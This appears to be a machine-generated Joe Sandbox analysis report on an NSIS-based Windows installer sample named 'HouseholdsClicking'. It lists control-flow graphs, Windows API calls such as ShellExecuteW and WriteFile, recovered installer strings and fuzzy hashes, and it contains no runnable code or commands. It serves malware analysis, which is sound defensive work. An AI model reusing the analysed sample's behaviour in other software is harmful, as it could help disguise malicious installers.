                                                                                                                                            control_flow_graph 587 40337f-403398 588 4033a1-4033a9 587->588 589 40339a 587->589 590 4033b2-4033b7 588->590 591 4033ab 588->591 589->588 592 4033c7-4033d4 call 403336 590->592 593 4033b9-4033c2 call 403368 590->593 591->590 597 4033d6 592->597 598 4033de-4033e5 592->598 593->592 599 4033d8-4033d9 597->599 600 403546-403548 598->600 601 4033eb-403432 GetTickCount 598->601 604 403567-40356b 599->604 602 40354a-40354d 600->602 603 4035ac-4035af 600->603 605 403564 601->605 606 403438-403440 601->606 607 403552-40355b call 403336 602->607 608 40354f 602->608 609 4035b1 603->609 610 40356e-403574 603->610 605->604 611 403442 606->611 612 403445-403453 call 403336 606->612 607->597 620 403561 607->620 608->607 609->605 615 403576 610->615 616 403579-403587 call 403336 610->616 611->612 612->597 621 403455-40345e 612->621 615->616 616->597 624 40358d-40359f WriteFile 616->624 620->605 623 403464-403484 call 4076a0 621->623 630 403538-40353a 623->630 631 40348a-40349d GetTickCount 623->631 626 4035a1-4035a4 624->626 627 40353f-403541 624->627 626->627 629 4035a6-4035a9 626->629 627->599 629->603 630->599 632 4034e8-4034ec 631->632 633 40349f-4034a7 631->633 634 40352d-403530 632->634 635 4034ee-4034f1 632->635 636 4034a9-4034ad 633->636 637 4034af-4034e0 MulDiv wsprintfW call 404f9e 633->637 634->606 641 403536 634->641 639 403513-40351e 635->639 640 4034f3-403507 WriteFile 635->640 636->632 636->637 642 4034e5 637->642 644 403521-403525 639->644 640->627 643 403509-40350c 640->643 641->605 642->632 643->627 645 40350e-403511 643->645 644->623 646 40352b 644->646 645->644 646->605
                                                                                                                                            APIs
                                                                                                                                            • GetTickCount.KERNEL32 ref: 004033F1
                                                                                                                                            • GetTickCount.KERNEL32 ref: 00403492
                                                                                                                                            • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
                                                                                                                                            • wsprintfW.USER32 ref: 004034CE
                                                                                                                                            • WriteFile.KERNELBASE(00000000,00000000,00426979,00403792,00000000), ref: 004034FF
                                                                                                                                            • WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CountFileTickWrite$wsprintf
                                                                                                                                            • String ID: (]C$... %d%%$pAB$y)B$yiB
                                                                                                                                            • API String ID: 651206458-3313267460
                                                                                                                                            • Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                                                            • Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
                                                                                                                                            • Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                                                            • Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 647 4035b3-403601 GetTickCount GetModuleFileNameW call 405e7c 650 403603-403608 647->650 651 40360d-40363b call 406035 call 40677d call 406035 GetFileSize 647->651 652 4037e2-4037e6 650->652 659 403641 651->659 660 403728-403736 call 4032d2 651->660 662 403646-40365d 659->662 666 4037f1-4037f6 660->666 667 40373c-40373f 660->667 664 403661-403663 call 403336 662->664 665 40365f 662->665 671 403668-40366a 664->671 665->664 666->652 669 403741-403759 call 403368 call 403336 667->669 670 40376b-403795 GlobalAlloc call 403368 call 40337f 667->670 669->666 698 40375f-403765 669->698 670->666 696 403797-4037a8 670->696 674 403670-403677 671->674 675 4037e9-4037f0 call 4032d2 671->675 676 4036f3-4036f7 674->676 677 403679-40368d call 405e38 674->677 675->666 683 403701-403707 676->683 684 4036f9-403700 call 4032d2 676->684 677->683 694 40368f-403696 677->694 687 403716-403720 683->687 688 403709-403713 call 4072ad 683->688 684->683 687->662 695 403726 687->695 688->687 694->683 700 403698-40369f 694->700 695->660 701 4037b0-4037b3 696->701 702 4037aa 696->702 698->666 698->670 700->683 703 4036a1-4036a8 700->703 704 4037b6-4037be 701->704 702->701 703->683 705 4036aa-4036b1 703->705 704->704 706 4037c0-4037db SetFilePointer call 405e38 704->706 705->683 707 4036b3-4036d3 705->707 710 4037e0 706->710 707->666 709 4036d9-4036dd 707->709 711 4036e5-4036ed 709->711 712 4036df-4036e3 709->712 710->652 711->683 713 4036ef-4036f1 711->713 712->695 712->711 713->683
                                                                                                                                            APIs
                                                                                                                                            • GetTickCount.KERNEL32 ref: 004035C4
                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0
                                                                                                                                              • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                              • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C
                                                                                                                                            Strings
                                                                                                                                            • Error launching installer, xrefs: 00403603
                                                                                                                                            • Null, xrefs: 004036AA
                                                                                                                                            • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
                                                                                                                                            • Inst, xrefs: 00403698
                                                                                                                                            • soft, xrefs: 004036A1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                            • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                            • API String ID: 4283519449-527102705
                                                                                                                                            • Opcode ID: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                                                                                            • Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
                                                                                                                                            • Opcode Fuzzy Hash: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                                                                                            • Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 714 404f9e-404fb1 715 404fb7-404fca 714->715 716 40506e-405070 714->716 717 404fd5-404fe1 lstrlenW 715->717 718 404fcc-404fd0 call 406831 715->718 720 404fe3-404ff3 lstrlenW 717->720 721 404ffe-405002 717->721 718->717 722 404ff5-404ff9 lstrcatW 720->722 723 40506c-40506d 720->723 724 405011-405015 721->724 725 405004-40500b SetWindowTextW 721->725 722->721 723->716 726 405017-405059 SendMessageW * 3 724->726 727 40505b-40505d 724->727 725->724 726->727 727->723 728 40505f-405064 727->728 728->723
                                                                                                                                            APIs
                                                                                                                                            • lstrlenW.KERNEL32(00445D80,00426979,74DF23A0,00000000), ref: 00404FD6
                                                                                                                                            • lstrlenW.KERNEL32(004034E5,00445D80,00426979,74DF23A0,00000000), ref: 00404FE6
                                                                                                                                            • lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426979,74DF23A0,00000000), ref: 00404FF9
                                                                                                                                            • SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                              • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426979,74DF23A0,00000000), ref: 00406902
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2740478559-0
                                                                                                                                            • Opcode ID: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                                                                            • Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
                                                                                                                                            • Opcode Fuzzy Hash: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                                                                            • Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 729 402713-40273b call 406035 * 2 734 402746-402749 729->734 735 40273d-402743 call 40145c 729->735 737 402755-402758 734->737 738 40274b-402752 call 40145c 734->738 735->734 741 402764-40278c call 40145c call 4062cf WritePrivateProfileStringW 737->741 742 40275a-402761 call 40145c 737->742 738->737 742->741
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                            • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: PrivateProfileStringWritelstrcpyn
                                                                                                                                            • String ID: <RM>$TournamentsDefenceBerry$WriteINIStr: wrote [%s] %s=%s in %s
                                                                                                                                            • API String ID: 247603264-1902620211
                                                                                                                                            • Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                                                            • Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
                                                                                                                                            • Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                                                            • Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 750 4021b5-40220b call 40145c * 4 call 404f9e ShellExecuteW 761 402223-4030f2 call 4062cf 750->761 762 40220d-40221b call 4062cf 750->762 762->761
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00426979,74DF23A0,00000000), ref: 00404FD6
                                                                                                                                              • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00426979,74DF23A0,00000000), ref: 00404FE6
                                                                                                                                              • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426979,74DF23A0,00000000), ref: 00404FF9
                                                                                                                                              • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                            • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202
                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                            Strings
                                                                                                                                            • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                                                                                            • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                                                                                            • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                                                                                            • API String ID: 3156913733-2180253247
                                                                                                                                            • Opcode ID: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                                                                            • Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
                                                                                                                                            • Opcode Fuzzy Hash: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                                                                            • Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 770 405eab-405eb7 771 405eb8-405eec GetTickCount GetTempFileNameW 770->771 772 405efb-405efd 771->772 773 405eee-405ef0 771->773 775 405ef5-405ef8 772->775 773->771 774 405ef2 773->774 774->775
                                                                                                                                            APIs
                                                                                                                                            • GetTickCount.KERNEL32 ref: 00405EC9
                                                                                                                                            • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CountFileNameTempTick
                                                                                                                                            • String ID: nsa
                                                                                                                                            • API String ID: 1716503409-2209301699
                                                                                                                                            • Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                                                            • Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
                                                                                                                                            • Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                                                            • Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 776 402175-40218b call 401446 * 2 781 402198-40219d 776->781 782 40218d-402197 call 4062cf 776->782 783 4021aa-4021b0 EnableWindow 781->783 784 40219f-4021a5 ShowWindow 781->784 782->781 786 4030e3-4030f2 783->786 784->786
                                                                                                                                            APIs
                                                                                                                                            • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                            • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Window$EnableShowlstrlenwvsprintf
                                                                                                                                            • String ID: HideWindow
                                                                                                                                            • API String ID: 1249568736-780306582
                                                                                                                                            • Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                                                            • Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
                                                                                                                                            • Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                                                            • Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D
                                                                                                                                            APIs
                                                                                                                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                                                                                            • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessageSend
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                            • Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                                                            • Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
                                                                                                                                            • Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                                                            • Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C
                                                                                                                                            APIs
                                                                                                                                            • GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$AttributesCreate
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 415043291-0
                                                                                                                                            • Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                                                            • Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
                                                                                                                                            • Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                                                            • Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15
                                                                                                                                            APIs
                                                                                                                                            • GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
                                                                                                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AttributesFile
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                            • Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                            • Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
